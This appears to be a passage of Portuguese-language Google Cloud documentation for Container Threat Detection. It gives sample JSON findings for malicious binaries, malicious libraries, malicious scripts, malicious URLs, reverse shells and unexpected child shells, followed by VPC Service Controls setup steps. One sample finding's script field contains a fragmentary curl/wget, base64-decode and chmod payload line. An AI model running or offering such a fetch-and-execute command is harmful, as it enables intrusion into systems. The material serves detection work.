            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://\""
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"\""
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
        "pid": "7",
        "parentPid": "1"
    "resourceName": "//",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  "resource": {
    "name": "//",
    "display_name": "CLUSTER_ID",
    "project_name": "//",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    "detectionCategory": {
      "ruleName": "built_in_malicious_binary_executed"
    "detectionPriority": "CRITICAL",
    "affectedResources": [
        "gcpResourceName": "//"
    "evidence": [
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911519",
            "nanos": 603253608
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": ""
      "virustotalIndicatorQueryUri": [
          "displayName": "VirusTotal IP Link",
          "url": ""
      "cloudLoggingQueryUri": [
          "displayName": "Cloud Logging Query Link",
          "url": ";query=timestamp%3D%222023-11-13T21:38:39.603253608Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
      "relatedFindingUri": {}

Execução: binário malicioso modificado executado

  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Modified Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
    "createTime": "2023-11-13T21:38:51.893Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:51.525Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
      "nodes": [
          "name": "//"
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
        "binary": {
          "path": "\"/malicious_files/file_to_be_modified\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        "args": [
        "argumentsTruncated": false,
        "envVariables": [
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://\""
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-modified-malicious-binary\""
            "name": "\"HOME\"",
            "val": "\"/root\""
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"\""
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://\""
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"\""
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
        "pid": "8",
        "parentPid": "1"
    "resourceName": "//",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  "resource": {
    "name": "//",
    "display_name": "CLUSTER_ID",
    "project_name": "//",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    "detectionCategory": {
      "ruleName": "modified_malicious_binary_executed"
    "detectionPriority": "CRITICAL",
    "affectedResources": [
        "gcpResourceName": "//"
    "evidence": [
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699905066",
            "nanos": 618571329
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": ""
      "virustotalIndicatorQueryUri": [
          "displayName": "VirusTotal IP Link",
          "url": ""
      "cloudLoggingQueryUri": [
          "displayName": "Cloud Logging Query Link",
          "url": ";query=timestamp%3D%222023-11-13T21:38:39.084524438Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
      "relatedFindingUri": {}

Execução: biblioteca maliciosa modificada carregada

  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Modified Malicious Library Loaded",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
    "createTime": "2023-11-13T21:38:55.271Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:55.133Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
      "nodes": [
          "name": "//"
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
        "binary": {
          "path": "\"/malicious_files/drop_mal_lib\"",
          "size": "5005064",
          "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
          "hashedSize": "5005064",
          "partiallyHashed": false
        "libraries": [
            "path": "\"/malicious_files/file_to_be_modified\"",
            "size": "68",
            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
            "hashedSize": "68",
            "partiallyHashed": false
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        "args": [
        "argumentsTruncated": false,
        "envVariables": [
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://\""
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-modified-malicious-library\""
            "name": "\"HOME\"",
            "val": "\"/root\""
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"\""
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://\""
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"\""
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
        "pid": "8",
        "parentPid": "1"
    "resourceName": "//",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  "resource": {
    "name": "//",
    "display_name": "CLUSTER_ID",
    "project_name": "//",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    "detectionCategory": {
      "ruleName": "modified_malicious_library_loaded"
    "detectionPriority": "CRITICAL",
    "affectedResources": [
        "gcpResourceName": "//"
    "evidence": [
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911519",
            "nanos": 124151422
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": ""
      "virustotalIndicatorQueryUri": [
          "displayName": "VirusTotal IP Link",
          "url": ""
      "cloudLoggingQueryUri": [
          "displayName": "Cloud Logging Query Link",
          "url": ";query=timestamp%3D%222023-11-13T21:38:39.124151422Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
      "relatedFindingUri": {}

Script malicioso executado

  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//",
    "state": "ACTIVE",
    "category": "Malicious Script Executed",
    "sourceProperties": {
      "VM_Instance_Name": "INSTANCE_ID",
      "Script_Filename": "FILENAME",
      "Script_SHA256": "SHA_256",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Name": "CONTAINER_NAME",
      "Parent_Pid": 1.0,
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Creation_Timestamp": {
        "seconds": 1.617989997E9,
        "nanos": 1.17396995E8
      "Pid": 53.0,
      "Pod_Namespace": "default",
      "Process_Binary_Fullpath": "INTERPRETER",
      "Process_Arguments": ["INTERPRETER", "FILENAME"],
      "Pod_Name": "POD_NAME",
      "description": "A machine learning model using Natural Language Processing (NLP) techniques identified an executed bash script as malicious.",
      "Script_Content": "(curl -fsSL||wget -q -O -| tac | base64 -di | exit 0 | > x ; chmod 777 x ;",
      "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
      test-4af235e12be6f9d9", "HOME\u003d/root",
      "Container_Creation_Timestamp": {
        "seconds": 1.617989918E9,
        "nanos": 0.0
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    "eventTime": "2021-04-09T17:39:57.527Z",
    "createTime": "2021-04-09T17:39:57.625Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            "nanos": {
              "primitiveDataType": "NUMBER"
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
      "description": {
        "primitiveDataType": "STRING"
      "Pid": {
        "primitiveDataType": "NUMBER"
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      "Pod_Name": {
        "primitiveDataType": "STRING"
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            "nanos": {
              "primitiveDataType": "NUMBER"
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      "Script_Content": {
        "primitiveDataType": "STRING"
      "Script_Filename": {
        "primitiveDataType": "STRING"
      "Container_Name": {
        "primitiveDataType": "STRING"
      "Script_SHA256": {
        "primitiveDataType": "STRING"
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  "resource": {
    "name": "//",
    "projectName": "//",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"

URL malicioso observado

      "findings": {
        "access": {},
        "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
        "category": "Malicious URL Observed",
        "containers": [
            "name": "CONTAINER_NAME",
            "uri": "CONTAINER_URI",
            "imageId": "CONTAINER_IMAGE_ID"
        "createTime": "2022-09-14T21:35:46.209Z",
        "database": {},
        "description": "A malicious URL is observed in the container workload.",
        "eventTime": "2022-09-14T21:35:45.992Z",
        "exfiltration": {},
        "findingClass": "THREAT",
        "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
        "indicator": {
          "uris": [
        "kubernetes": {
          "pods": [
              "ns": "default",
              "name": "CONTAINER_NAME",
              "containers": [
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
        "mitreAttack": {
          "primaryTactic": "COMMAND_AND_CONTROL",
          "primaryTechniques": [
        "mute": "UNDEFINED",
        "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
        "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
        "parentDisplayName": "Container Threat Detection",
        "processes": [
            "binary": {
              "path": "\"/bin/echo\""
            "script": {},
            "args": [
            "envVariables": [
                "name": "\"PATH\"",
                "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
                "name": "\"HOSTNAME\"",
                "val": "\"CONTAINER_NAME\""
                "name": "\"DEBIAN_FRONTEND\"",
                "val": "\"noninteractive\""
                "name": "\"LANG\"",
                "val": "\"C.UTF-8\""
                "name": "\"PYTHONUNBUFFERED\"",
                "val": "\"1\""
                "name": "\"PORT\"",
                "val": "\"8080\""
                "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
                "val": "\"IP_ADDRESS\""
                "name": "\"KUBERNETES_SERVICE_HOST\"",
                "val": "\"IP_ADDRESS\""
                "name": "\"KUBERNETES_SERVICE_PORT\"",
                "val": "\"443\""
                "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
                "val": "\"443\""
                "name": "\"KUBERNETES_PORT\"",
                "val": "\"tcp://IP_ADDRESS:443\""
                "name": "\"KUBERNETES_PORT_443_TCP\"",
                "val": "\"tcp://IP_ADDRESS:443\""
                "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
                "val": "\"tcp\""
                "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
                "val": "\"443\""
                "name": "\"HOME\"",
                "val": "\"/root\""
            "pid": "1"
        "resourceName": "//",
        "severity": "MEDIUM",
        "sourceDisplayName": "Container Threat Detection",
        "state": "ACTIVE",
        "vulnerability": {},
        "workflowState": "NEW"
      "resource": {
        "name": "//",
        "display_name": "CLUSTER_ID",
        "project_name": "//",
        "project_display_name": "PROJECT_ID",
        "parent_name": "//",
        "parent_display_name": "PROJECT_ID",
        "type": "google.container.Cluster",
        "folders": []
      "sourceProperties": {
        "Container_Image_Id": "CONTAINER_IMAGE_ID",
        "Pod_Namespace": "default",
        "Container_Name": "CONTAINER_NAME",
        "Process_Binary_Fullpath": "/bin/echo",
        "description": "A malicious URL is observed in the container workload.",
        "VM_Instance_Name": "VM_INSTANCE_NAME",
        "Pid": 1,
        "Process_Arguments": [
        "Container_Image_Uri": "CONTAINER_IMAGE_URI",
        "Parent_Pid": 0,
        "Process_Creation_Timestamp": {
          "seconds": 1663191345,
          "nanos": 7717272
        "Environment_Variables": [
        "Container_Creation_Timestamp": {
          "seconds": 1663191345,
          "nanos": 0
        "Pod_Name": "CONTAINER_NAME"

Shell reverso

  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//",
    "state": "ACTIVE",
    "category": "Reverse Shell",
    "sourceProperties": {
      "Reverse_Shell_Stdin_Redirection_Src_Ip": "SOURCE_IP_ADDRESS",
      "Environment_Variables": ["HOSTNAME\u003dreverse-shell",
      , "PWD\u003d/home/vmagent/app", "LANG\u003dC.UTF-8", "SHLVL\u003d1",
      "HOME\u003d/root", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "DEBIAN_FRONTEND\u003dnoninteractive", "PORT\u003d8080",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "_\u003d/bin/echo"],
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Container_Creation_Timestamp": {
        "seconds": 1.617989861E9,
        "nanos": 0.0
      "Pod_Name": "POD_NAME",
      "Container_Name": "CONTAINER_NAME",
      "Process_Arguments": ["BINARY_PATH", "BINARY_NAME"],
      "Pid": 15.0,
      "Reverse_Shell_Stdin_Redirection_Dst_Port": DESTINATION_PORT,
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Reverse_Shell_Stdin_Redirection_Dst_Ip": "DESTINATION_IP_ADDRESS",
      "Pod_Namespace": "default",
      "VM_Instance_Name": "INSTANCE_ID",
      "Reverse_Shell_Stdin_Redirection_Src_Port": SOURCE_PORT,
      "description": "A process started with stream redirection to a remote
      connected socket. With a reverse shell, an attacker can communicate from a
      compromised workload to an attacker-controlled machine. The attacker can
      then command and control the workload to perform desired actions, for
      example as part of a botnet.",
      "Parent_Pid": 1.0,
      "Process_Creation_Timestamp": {
        "seconds": 1.61798989E9,
        "nanos": 6.16573691E8
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    "eventTime": "2021-04-09T17:38:10.904Z",
    "createTime": "2021-04-09T17:38:15.486Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            "nanos": {
              "primitiveDataType": "NUMBER"
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
      "Reverse_Shell_Stdin_Redirection_Dst_Ip": {
        "primitiveDataType": "STRING"
      "description": {
        "primitiveDataType": "STRING"
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
      "Pid": {
        "primitiveDataType": "NUMBER"
      "Reverse_Shell_Stdin_Redirection_Src_Ip": {
        "primitiveDataType": "STRING"
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      "Reverse_Shell_Stdin_Redirection_Dst_Port": {
        "primitiveDataType": "NUMBER"
      "Pod_Name": {
        "primitiveDataType": "STRING"
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            "nanos": {
              "primitiveDataType": "NUMBER"
      "Reverse_Shell_Stdin_Redirection_Src_Port": {
        "primitiveDataType": "NUMBER"
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      "Container_Name": {
        "primitiveDataType": "STRING"
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  "resource": {
    "name": "//",
    "projectName": "//",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"

Shell filho inesperado

  "finding": {
    "access": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Unexpected Child Shell",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
    "createTime": "2023-06-29T17:34:13.765Z",
    "database": {},
    "description": "A process should not normally create child shell processes, spawn a child shell process.",
    "eventTime": "2023-06-29T17:34:13.492Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
          "ns": "default",
          "name": "CONTAINER_NAME",
          "containers": [
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_URI",
              "imageId": CONTAINER_IMAGE_ID"
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
        "binary": {
          "path": "\"/home/vmagent/app/temp/dash\"",
          "size": "31376",
          "sha256": "31351885b07570f450f57bd19cf28ff4310b8774a1c2580c3c7c9e7336c8467e",
          "hashedSize": "31376",
          "partiallyHashed": false
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        "args": [
        "argumentsTruncated": false,
        "envVariables": [
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-unexpected-child-shell-3f50de2ab54bac1b\""
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://\""
            "name": "\"PYTHONUNBUFFERED\"",
            "val": "\"1\""
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"\""
            "name": "\"PATH\"",
            "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
            "name": "\"PWD\"",
            "val": "\"/home/vmagent/app\""
            "name": "\"LANG\"",
            "val": "\"C.UTF-8\""
            "name": "\"SHLVL\"",
            "val": "\"1\""
            "name": "\"HOME\"",
            "val": "\"/root\""
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
            "name": "\"PORT\"",
            "val": "\"8080\""
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"\""
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://\""
            "name": "\"_\"",
            "val": "\"./temp/dash\""
        "pid": "15",
        "parentPid": "14"
        "binary": {
          "path": "\"/home/vmagent/app/temp/consul\"",
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        "args": [
        "argumentsTruncated": false,
        "pid": "14",
        "parentPid": "13"
    "resourceName": "//",
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {}
  "resource": {
    "name": "//",
    "display_name": "CLUSTER_ID",
    "project_name": "//",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  "sourceProperties": {
    "Process_Arguments": [
    "Pid": 15,
    "Process_Creation_Timestamp": {
      "seconds": 1688060050,
      "nanos": 207040864
    "Container_Image_Uri": "CONTAINER_IMAGE_URI",
    "Process_Binary_Fullpath": "/home/vmagent/app/temp/dash",
    "VM_Instance_Name": "INSTANCE_ID",
    "Pod_Name": "POD_NAME",
    "Pod_Namespace": "default",
    "Container_Name": "CONTAINER_NAME",
    "Container_Image_Id": "CONTAINER_IMAGE_ID",
    "Container_Creation_Timestamp": {
      "seconds": 1688060050,
      "nanos": 0
    "Parent_Pid": 14,
    "Environment_Variables": [

Verificar projetos protegidos por um perímetro de serviço

Se você ativou o Security Command Center no nível da organização depois 7 de dezembro de 2023 e tenham um perímetro de serviço que bloqueia o acesso a determinados projetos e serviços, conceda à conta de serviço acesso de entrada do Container Threat Detection a esse perímetro de serviço. Caso contrário, o Container Threat Detection não consegue produzir descobertas relacionadas aos projetos e serviços protegidos.

Para ativações no nível da organização, o identificador da conta de serviço é um e-mail no seguinte formato:

No exemplo anterior, substitua ORGANIZATION_ID com o identificador numérico da organização.

Para conceder a uma conta de serviço o acesso de entrada a um perímetro de serviço, siga estas etapas.

  1. Acesse o VPC Service Controls.

    Acessar o VPC Service Controls

  2. Na barra de ferramentas, selecione sua organização do Google Cloud.

    Seletor de projetos

  3. Na lista suspensa, selecione a política de acesso que contém o perímetro de serviço a que você quer conceder acesso.

    Lista de políticas de acesso

    Os perímetros de serviço associados à política de acesso aparecem na lista.

  4. Clique no nome do serviço.

  5. Clique em Editar perímetro.

  6. No menu de navegação, clique em Política de entrada.

  7. Clique em Adicionar regra.

  8. Configure a regra da seguinte maneira:

    Atributos FROM do cliente da API

    1. Em Origem, selecione Todas as fontes.
    2. Em Identidade, selecione Identidades selecionadas.
    3. No campo Add User/Service Account, clique em Select.
    4. Insira o endereço de e-mail da conta de serviço. Se você tiver contas de serviço no nível da organização e do projeto, adicione ambas.
    5. Clique em Save.

    Atributos TO de serviços/recursos do GCP

    1. Em Projeto, selecione Todos os projetos.

    2. Em Serviços, selecione Todos os serviços ou cada uma das seguintes opções serviços individuais exigidos pelo Container Threat Detection:

      • API Container Threat Detection

      Se um perímetro de serviço restringir o acesso a um serviço necessário, O Container Threat Detection não pode produzir descobertas para esse serviço.

    3. No menu de navegação, clique em Salvar.

    Para mais informações, consulte Como configurar políticas de entrada e saída.

    A seguir